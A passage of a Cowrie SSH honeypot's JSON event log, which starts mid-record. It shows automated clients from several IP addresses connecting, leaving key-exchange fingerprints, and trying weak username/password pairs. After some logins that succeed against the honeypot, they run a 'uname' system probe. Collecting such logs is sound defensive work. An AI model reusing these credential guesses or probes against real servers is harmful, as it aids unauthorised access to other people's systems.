ha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:05:26.316834Z","src_ip":"212.227.235.229","session":"5a88bd365c24"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"P@ssw0rd123","message":"login attempt [ftpuser/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:05:27.289740Z","src_ip":"212.227.235.229","session":"e4805d244549"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40288,"dst_ip":"1.2.3.4","dst_port":22,"session":"8c4b852d57e4","protocol":"ssh","message":"New connection: 212.227.125.160:40288 (1.2.3.4:22) [session: 8c4b852d57e4]","sensor":"my-vps","timestamp":"2025-08-31T03:05:28.008873Z"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:05:28.069610Z","src_ip":"212.227.125.160","session":"8c4b852d57e4"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:05:29.133047Z","src_ip":"212.227.235.229","session":"e4805d244549"}
{"eventid":"cowrie.login.success","username":"root","password":"password","message":"login attempt [root/password] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:05:32.339293Z","src_ip":"212.227.125.160","session":"f69620544d6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41602,"dst_ip":"1.2.3.4","dst_port":22,"session":"4830bd1847d2","protocol":"ssh","message":"New connection: 212.227.125.160:41602 (1.2.3.4:22) [session: 4830bd1847d2]","sensor":"my-vps","timestamp":"2025-08-31T03:05:41.863164Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:05:42.369296Z","src_ip":"212.227.125.160","session":"4830bd1847d2"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:05:42.369999Z","src_ip":"212.227.125.160","session":"4830bd1847d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34544,"dst_ip":"1.2.3.4","dst_port":22,"session":"672d1a982b00","protocol":"ssh","message":"New connection: 212.227.235.229:34544 (1.2.3.4:22) [session: 672d1a982b00]","sensor":"my-vps","timestamp":"2025-08-31T03:05:44.151898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:05:44.153051Z","src_ip":"212.227.235.229","session":"672d1a982b00"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:05:44.399523Z","src_ip":"212.227.235.229","session":"672d1a982b00"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"P@ssw0rd123","message":"login attempt [ftpuser/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:05:44.995635Z","src_ip":"212.227.125.160","session":"4830bd1847d2"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":35226,"dst_ip":"1.2.3.4","dst_port":22,"session":"f08b96bc7b6a","protocol":"ssh","message":"New connection: 41.226.27.251:35226 (1.2.3.4:22) [session: f08b96bc7b6a]","sensor":"my-vps","timestamp":"2025-08-31T03:05:45.054112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:05:45.055097Z","src_ip":"41.226.27.251","session":"f08b96bc7b6a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:05:45.100077Z","src_ip":"41.226.27.251","session":"f08b96bc7b6a"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy123","message":"login attempt [deploy/deploy123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:05:45.140707Z","src_ip":"212.227.235.229","session":"672d1a982b00"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:05:45.235336Z","src_ip":"41.226.27.251","session":"f08b96bc7b6a"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:05:46.388924Z","src_ip":"212.227.235.229","session":"672d1a982b00"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:05:46.544707Z","src_ip":"41.226.27.251","session":"f08b96bc7b6a"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:05:46.716256Z","src_ip":"212.227.125.160","session":"4830bd1847d2"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:05:47.078433Z","src_ip":"212.227.235.229","session":"1faf702588ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34912,"dst_ip":"1.2.3.4","dst_port":22,"session":"ea5ce26c8e39","protocol":"ssh","message":"New connection: 212.227.125.160:34912 (1.2.3.4:22) [session: ea5ce26c8e39]","sensor":"my-vps","timestamp":"2025-08-31T03:05:49.904191Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:05:52.318027Z","src_ip":"212.227.125.160","session":"f69620544d6e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:05:52.318809Z","src_ip":"212.227.125.160","session":"f69620544d6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33350,"dst_ip":"1.2.3.4","dst_port":22,"session":"0bb753c9a547","protocol":"ssh","message":"New connection: 212.227.235.229:33350 (1.2.3.4:22) [session: 0bb753c9a547]","sensor":"my-vps","timestamp":"2025-08-31T03:05:52.463139Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:05:52.464011Z","src_ip":"212.227.235.229","session":"0bb753c9a547"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:05:52.714105Z","src_ip":"212.227.235.229","session":"0bb753c9a547"}
{"eventid":"cowrie.login.success","username":"root","password":"qwerty","message":"login attempt [root/qwerty] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:05:53.466882Z","src_ip":"212.227.235.229","session":"0bb753c9a547"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:05:53.986425Z","src_ip":"212.227.235.229","session":"0bb753c9a547"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:05:53.987160Z","src_ip":"212.227.235.229","session":"0bb753c9a547"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:05:54.238997Z","src_ip":"212.227.235.229","session":"0bb753c9a547"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:05:54.240246Z","src_ip":"212.227.235.229","session":"0bb753c9a547"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":53812,"dst_ip":"1.2.3.4","dst_port":22,"session":"898c1eda1972","protocol":"ssh","message":"New connection: 41.226.27.251:53812 (1.2.3.4:22) [session: 898c1eda1972]","sensor":"my-vps","timestamp":"2025-08-31T03:06:05.607306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:06:05.611630Z","src_ip":"41.226.27.251","session":"898c1eda1972"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:06:05.650512Z","src_ip":"41.226.27.251","session":"898c1eda1972"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456","message":"login attempt [oracle/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:06:05.822606Z","src_ip":"41.226.27.251","session":"898c1eda1972"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34788,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff9537dbcfd5","protocol":"ssh","message":"New connection: 212.227.125.160:34788 (1.2.3.4:22) [session: ff9537dbcfd5]","sensor":"my-vps","timestamp":"2025-08-31T03:06:06.825221Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:06:06.832552Z","src_ip":"212.227.125.160","session":"ff9537dbcfd5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:06:07.137948Z","src_ip":"212.227.125.160","session":"ff9537dbcfd5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:06:07.152189Z","src_ip":"41.226.27.251","session":"898c1eda1972"}
{"eventid":"cowrie.login.failed","username":"ansible","password":"123@qwe","message":"login attempt [ansible/123@qwe] failed","sensor":"my-vps","timestamp":"2025-08-31T03:06:08.148640Z","src_ip":"212.227.125.160","session":"ff9537dbcfd5"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:06:09.403149Z","src_ip":"212.227.125.160","session":"ff9537dbcfd5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38702,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e748c69457a","protocol":"ssh","message":"New connection: 212.227.235.229:38702 (1.2.3.4:22) [session: 0e748c69457a]","sensor":"my-vps","timestamp":"2025-08-31T03:06:15.077823Z"}
{"eventid":"cowrie.session.closed","duration":"26.7","message":"Connection lost after 26.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:06:16.605677Z","src_ip":"212.227.125.160","session":"ea5ce26c8e39"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35602,"dst_ip":"1.2.3.4","dst_port":22,"session":"e819ddd7d3e7","protocol":"ssh","message":"New connection: 212.227.235.229:35602 (1.2.3.4:22) [session: e819ddd7d3e7]","sensor":"my-vps","timestamp":"2025-08-31T03:06:17.731172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:06:17.732589Z","src_ip":"212.227.235.229","session":"e819ddd7d3e7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:06:17.987032Z","src_ip":"212.227.235.229","session":"e819ddd7d3e7"}
{"eventid":"cowrie.login.success","username":"root","password":"111111","message":"login attempt [root/111111] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:06:18.751070Z","src_ip":"212.227.235.229","session":"e819ddd7d3e7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":59748,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d6aae38da16","protocol":"ssh","message":"New connection: 212.227.235.229:59748 (1.2.3.4:22) [session: 4d6aae38da16]","sensor":"my-vps","timestamp":"2025-08-31T03:06:19.169342Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:06:19.281339Z","src_ip":"212.227.235.229","session":"e819ddd7d3e7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:06:19.282308Z","src_ip":"212.227.235.229","session":"e819ddd7d3e7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:06:19.537867Z","src_ip":"212.227.235.229","session":"e819ddd7d3e7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:06:19.539108Z","src_ip":"212.227.235.229","session":"e819ddd7d3e7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:06:19.906713Z","src_ip":"212.227.235.229","session":"4d6aae38da16"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:06:19.907407Z","src_ip":"212.227.235.229","session":"4d6aae38da16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"31.4","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 31.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:06:23.684614Z","src_ip":"212.227.125.160","session":"f69620544d6e"}
{"eventid":"cowrie.session.closed","duration":"101.2","message":"Connection lost after 101.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:06:23.932077Z","src_ip":"212.227.125.160","session":"f69620544d6e"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"letmein","message":"login attempt [ftpuser/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T03:06:25.829687Z","src_ip":"212.227.235.229","session":"4d6aae38da16"}
